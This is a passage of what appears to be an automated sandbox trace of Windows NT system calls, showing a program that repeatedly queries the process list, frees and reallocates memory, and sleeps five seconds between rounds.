[0133.148] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0133.148] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0133.149] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0133.151] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0133.151] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0133.162] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0133.162] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0133.163] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0133.163] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0133.163] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0133.165] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0133.166] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0133.178] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0133.178] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0133.179] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0133.179] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0133.179] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0133.181] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0133.182] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0133.194] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0133.194] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0133.194] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0133.195] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0133.195] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0133.197] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0133.197] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0133.209] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0133.209] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0133.210] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0133.210] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0133.210] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0133.212] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0133.213] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0133.224] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0133.225] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0133.225] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0133.225] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0133.226] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0133.228] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0133.228] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0133.240] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0133.240] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0133.241] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0133.241] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0133.241] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0133.243] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0133.244] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0133.257] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0133.257] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0133.257] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0133.257] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0133.258] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0133.260] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0133.260] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0133.273] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0133.273] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0133.274] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0133.274] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0133.274] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0133.276] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0133.277] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0133.287] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0133.287] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0133.287] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0133.288] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0133.288] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0133.290] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0133.290] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0133.302] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0133.303] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0133.303] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0133.303] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0133.303] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0133.305] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0133.306] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0133.318] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0133.318] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0133.319] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0133.319] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0133.319] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0133.321] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0133.322] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0133.334] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0133.334] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0133.334] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0133.334] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0133.335] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0133.336] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0133.337] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0133.349] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0133.350] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0133.350] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0133.350] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0133.350] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0133.352] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0133.353] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0133.366] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0133.366] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0133.366] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0133.367] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0133.367] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0133.369] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0133.369] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0133.380] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0133.381] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0133.381] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0133.381] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0133.381] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0133.383] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0133.384] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0133.396] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0133.396] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0133.397] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0133.397] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0133.397] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0133.399] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0133.400] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0133.412] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0133.413] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0133.413] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0133.413] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0133.414] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0133.416] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0133.416] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0133.427] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0133.427] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0133.428] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0133.428] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0133.428] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0133.430] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0133.431] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0133.443] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0133.443] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0133.443] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0133.443] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0133.444] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0133.446] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0133.446] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0133.458] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0133.459] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0133.459] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0133.459] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0133.460] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0133.462] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0133.462] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0133.475] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0133.475] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0133.476] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0133.476] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: 